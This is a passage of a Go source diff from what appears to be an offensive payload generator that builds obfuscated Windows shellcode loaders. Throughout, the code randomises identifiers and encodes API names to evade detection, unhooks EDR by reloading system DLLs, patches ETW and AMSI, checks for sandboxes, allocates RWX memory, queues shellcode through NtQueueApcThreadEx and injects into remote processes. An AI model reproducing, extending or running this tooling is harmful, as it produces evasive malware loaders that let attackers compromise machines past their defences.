Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - Binary.Variables["NTFuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - Binary.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) - Binary.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["buff"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["virtualAlloc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["alloc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["protect"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dll"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["error"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["x"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["file"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["loaddll"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["handle"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["old"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["shellcode"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["loader"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["DLLname"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Reloading"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Console"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["getWin"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["showWin"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hwnd"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["show"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["SW_HIDE"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Version"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["syscall"] = Cryptor.VarNumberLength(10, 19) - - Binary.Variables["customsyscallVP"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["loc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["mem"] = Cryptor.VarNumberLength(10, 19) - - Binary.Variables["Versionfunc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["k"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["MV"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["MinV"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["syscallnumber"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["bytesdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["locdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["xdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllBasedata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["customsyscall"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["handlez"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["CreateProcess"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Target"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["addr"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["buf"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["commandLine"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["data"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["err"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hModule"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hProcess"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["handleSize"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hh"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["lpBuffer"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["mi"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["mod"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["modules"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["module"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["nLength"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["nSize"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["name"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["needed"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["n"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["offsetaddr"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldProtect"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["outString"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["pi"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["process"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["rawbytes"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["s"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["si"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["size"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["startupInfo"] = Cryptor.VarNumberLength(10, 19) - b64number := Cryptor.GenerateNumer(3, 6) - Binary.Variables["b64number"] = strconv.Itoa(b64number) - Binary.Variables["decode"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["b64"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["decoded"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["number"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["sum"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["GetConsoleWindowName"] = Utils.StringEncode("GetConsoleWindow", b64number) - Binary.Variables["ShowWindowName"] = Utils.StringEncode("ShowWindow", b64number) - Binary.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) - Binary.Variables["MI"] = Cryptor.VarNumberLength(4, 9) - - WindowsVersion.Variables["Version"] = Binary.Variables["Version"] - WindowsVersion.Variables["syscall"] = Binary.Variables["syscall"] - WindowsVersion.Variables["customsyscall"] = Binary.Variables["customsyscall"] - WindowsVersion.Variables["customsyscallVP"] = Binary.Variables["customsyscallVP"] + Reload.Variables["customsyscallVP"] = Binary.Variables["customsyscallVP"] + Reload.Variables["customsyscall"] = Binary.Variables["customsyscall"] + Reload.Variables["Reloading"] = Binary.Variables["Reloading"] + Reload.Variables["DLLname"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dll"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["error"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["handlez"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["handle"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["loaddll"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["loc"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["mem"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["x"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["file"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ntPathW"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ntPath"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["DLL"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["objectAttributes"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["KnownDll"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["fullbytes"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["rawdata"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["CleanSystemDLL"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["sztViewSize"] = Cryptor.VarNumberLength(10, 19) + + Reload.Variables["Address"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["FindAddress"] = FindAddress + Reload.Variables["NtOpenSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["NtMapViewOfSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["mxKeSFQASvbvx"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ttttt"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["procNtOpenSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["procNtMapViewOfSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["procNtUnmapViewOfSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["sstring"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["KnownDLL"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["WriteMemoryfunc"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["index"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["writePtr"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["inbuf"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["destination"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["v"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["xx"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["handlee"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["filee"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ddhandlez"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["loaddlll"] = Cryptor.VarNumberLength(10, 19) + + if evasion == "KnownDLL" { + if console == true { + Reload.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: C:\\\\Windows\\\\System32\\\\\"+" + Reload.Variables["DLL"] + "+\" \")" + } else { + Reload.Variables["ReloadingMessage"] = `` + } + ReloadTemplate, err := template.New("Reload").Parse(Struct.KnownDLL_Refresh()) - buffer.Reset() - WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(Struct.WindowsVersion_Syscall()) - if err != nil { - log.Fatal(err) + if err != nil { + log.Fatal(err) + } + + if err := ReloadTemplate.Execute(&buffer, Reload); err != nil { + log.Fatal(err) + } + ReloadCode = buffer.String() } - buffer.Reset() - if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { - log.Fatal(err) + if evasion == "Disk" { + if console == true { + Reload.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Reload.Variables["DLLname"] + "[i]+\" \")" + } else { + Reload.Variables["ReloadingMessage"] = `` + } + ReloadTemplate, err := template.New("Reload").Parse(Struct.Disk_Refresh()) + if err != nil { + log.Fatal(err) + } + if err := ReloadTemplate.Execute(&buffer, Reload); err != nil { + log.Fatal(err) + } + ReloadCode = buffer.String() } - Binary.Variables["SyscallNumberlist"] = buffer.String() + if evasion == "None" { + Binary.Variables["Reloading"] = "" + Reload.Variables["ReloadingMessage"] = "" + ReloadCode = "" + } + + Binary.Variables["ReloadFunction"] = ReloadCode buffer.Reset() - if console == true && ProcessInjection == "" { - Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" - Binary.Variables["DebugImport"] = `"io" - "os" - "fmt"` - Binary.Variables["Debug"] = ` - var ( - debugWriter io.Writer - ) - - func printDebug(format string, v ...interface{}) { - debugWriter = os.Stdout - output := fmt.Sprintf("[DEBUG] ") - output += format +"\n" - fmt.Fprintf(debugWriter, output, v...) - } - ` - Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" - Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" - Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" - Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" - Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" - Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" - Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" - Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Binary.Variables["DLLname"] + "+\" \")" - Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" - - } else if console == true && ProcessInjection != "" { + if console == true { Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" - Binary.Variables["DebugImport"] = `"io" - "os"` - Binary.Variables["Debug"] = ` - var ( - debugWriter io.Writer - ) - - func printDebug(format string, v ...interface{}) { - debugWriter = os.Stdout - output := fmt.Sprintf("[DEBUG] ") - output += format +"\n" - fmt.Fprintf(debugWriter, output, v...) - } - ` Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" - Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" - Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" - Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" - Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" - Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" - Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Binary.Variables["DLLname"] + "+\" \")" - Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" + Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Binary.Variables["Version"] + ")" + Binary.Variables["AllocatingMessage"] = "printDebug(\"[+] Allocating a RWX section of the process\")" + Binary.Variables["RtlCopyMemoryMessage"] = "printDebug(\"[+] Copying shellcode to memory with RtlCopyMemory\")" + Binary.Variables["VirtualProtectMessage"] = "printDebug(\"[+] Calling a custom syscall version of NtProtectVirtualMemory to change memory to not writeable\")" + Binary.Variables["GetCurrentThreadMessage"] = "printDebug(\"[+] Calling GetCurrentThread to get a handle on the current process\")" + Binary.Variables["NtQueueApcThreadExMessage"] = "printDebug(\"[+] Calling NtQueueApcThreadEx to execute shellcode\")" + Binary.Variables["SyscallMessage"] = "printDebug(\"[*] Calling shellcode using a System Call\")" + + Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Binary.Variables["Version"] + ")" Binary.Variables["PPIDMessage"] = `strpid := fmt.Sprint(` + Binary.Variables["pi"] + `.ProcessId) printDebug("[*] Creating Remote Process: " + strpid) @@ -687,10 +637,8 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, Binary.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" Binary.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" Binary.Variables["Injected"] = "printDebug(\"[+] Injected!\")" - } else { Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)" - Binary.Variables["DebugImport"] = "" Binary.Variables["Debug"] = "" Binary.Variables["RefreshPE"] = "" Binary.Variables["EDR"] = "" @@ -709,125 +657,225 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, Binary.Variables["RemoteReloading"] = "" Binary.Variables["Injecting"] = "" Binary.Variables["Injected"] = "" - } - if sandbox == true { - if console == true { - Binary.Variables["SandboxOS"] = "" - } else { - Binary.Variables["SandboxOS"] = `"os"` - } - Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["domain"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["status"] = Cryptor.VarNumberLength(10, 19) - SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) - if err != nil { - log.Fatal(err) - } - if err := SandboxFunctionTemplate.Execute(&buffer, Binary); err != nil { - log.Fatal(err) - } - Binary.Variables["Sandboxfunction"] = buffer.String() - Binary.Variables["checker"] = Cryptor.VarNumberLength(10, 19) - Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) - buffer.Reset() - if err != nil { - log.Fatal(err) - } - if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Binary); err != nil { - log.Fatal(err) - } - Binary.Variables["Sandbox"] = buffer.String() - buffer.Reset() - } else { - Binary.Variables["Sandbox"] = "" - Binary.Variables["Sandboxfunction"] = "" - Binary.Variables["SandboxImport"] = "" - Binary.Variables["SandboxOS"] = "" - } + Binary.Variables["AllocatingMessage"] = "" + Binary.Variables["RtlCopyMemoryMessage"] = "" + Binary.Variables["VirtualProtectMessage"] = "" + Binary.Variables["GetCurrentThreadMessage"] = "" + Binary.Variables["NtQueueApcThreadExMessage"] = "" + Binary.Variables["SyscallMessage"] = "" - if (ETW == false || AMSI == false) || ProcessInjection != "" { - WriteProcessMemory_Function, decode, WriteProcessMemory := WriteProcessMemory_Buff(Binary.Variables["b64number"], b64number) - Binary.Variables["decode"] = decode - Binary.Variables["WriteProcessMemory_Function"] = WriteProcessMemory_Function - Binary.Variables["WriteProcessMemory"] = WriteProcessMemory - } else { - Binary.Variables["WriteProcessMemory_Function"] = "" } - if ETW == false { - ETW_Function, ETW := ETW_Buff(b64number, Binary.Variables["decode"], Binary.Variables["WriteProcessMemory"]) - Binary.Variables["ETW"] = ETW + "()" - Binary.Variables["ETW_Function"] = ETW_Function - Binary.Variables["B64"] = `"encoding/base64"` - } else { - Binary.Variables["ETW"] = "" - Binary.Variables["ETW_Function"] = "" - Binary.Variables["B64"] = `` - } - if AMSI == false { - AMSI_Function, AMSI := AMSI_Buff(Binary.Variables["WriteProcessMemory"]) - Binary.Variables["AMSI_Function"] = AMSI_Function - Binary.Variables["AMSI"] = AMSI + "()" + if Sleep == false { + Binary.Variables["SleepSecond"] = strconv.Itoa(Cryptor.GenerateNumer(2220, 2900)) + fmt.Println("[+] Sleep Timer set for " + Binary.Variables["SleepSecond"] + " milliseconds ") } else { - Binary.Variables["AMSI_Function"] = "" - Binary.Variables["AMSI"] = "" + Binary.Variables["SleepSecond"] = "0" } - if ETW == false || AMSI == false { - Binary.Variables["HEX_Import"] = `"encoding/hex"` - } else { - Binary.Variables["HEX_Import"] = `` + BinaryTemplate, err := template.New("Binary").Parse(Structure) + if err != nil { + log.Fatal(err) } - if AMSI == false { - AMSI_Function, AMSI := AMSI_Buff(Binary.Variables["WriteProcessMemory"]) - Binary.Variables["AMSI_Function"] = AMSI_Function - Binary.Variables["AMSI"] = AMSI + "()" - - } else { - Binary.Variables["AMSI_Function"] = "" - Binary.Variables["AMSI"] = "" + if err := BinaryTemplate.Execute(&buffer, Binary); err != nil { + log.Fatal(err) } + return buffer.String(), Binary.Variables["FuncName"], Binary.Variables["NTFuncName"] +} - if ETW == false || AMSI == false { - Binary.Variables["HEX_Import"] = `"encoding/hex"` +func Shellcode_Loader_Buff(Exec_Type string, ProcessInjection string, customsyscall string, customsyscallVP string, PROCESS_ALL_ACCESS string, WriteProcessMemory string, console bool, FindAddress string, RemoteETWFunctionName string) (string, string, string) { + var buffer bytes.Buffer + var Structure string + Shellcode_Loader := &Shellcode_Loader{} + Shellcode_Loader.Variables = make(map[string]string) + + Shellcode_Loader.Variables["FunctionName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["customsyscall"] = customsyscall + Shellcode_Loader.Variables["customsyscallVP"] = customsyscallVP + + //Syscall_RtlCopy + Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(4, 9) + Shellcode_Loader.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) + Shellcode_Loader.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["alloc"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["protect"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(4, 9) + + //Syscall_Alloc + Shellcode_Loader.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["protect"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["buff"] = Cryptor.VarNumberLength(10, 19) + + //Syscall_RtlCopy + Shellcode_Loader.Variables["kernel32"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["ntdll"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["VirtualAlloc"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["RtlCopyMemory"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["GetCurrentThread"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["thread"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["NtQueueApcThreadEx"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["FindAddress"] = FindAddress + + //Process Injection + Shellcode_Loader.Variables["RemoteETW"] = RemoteETWFunctionName + Shellcode_Loader.Variables["file"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["handle"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["old"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["shellcode"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["loader"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["bytesdata"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["locdata"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["xdata"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["dllBasedata"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["oldptrperms"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["CreateProcess"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["Target"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["addr"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["buf"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["commandLine"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["data"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["err"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["hModule"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["hProcess"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["handleSize"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["hh"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["lpBuffer"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["mi"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["mod"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["modules"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["module"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["nLength"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["nSize"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["name"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["needed"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["n"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["offsetaddr"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["oldProtect"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["outString"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["pi"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["process"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["rawbytes"] = Cryptor.VarNumberLength(10, 19) + Shellcode_Loader.Variables["raw_bin"] = 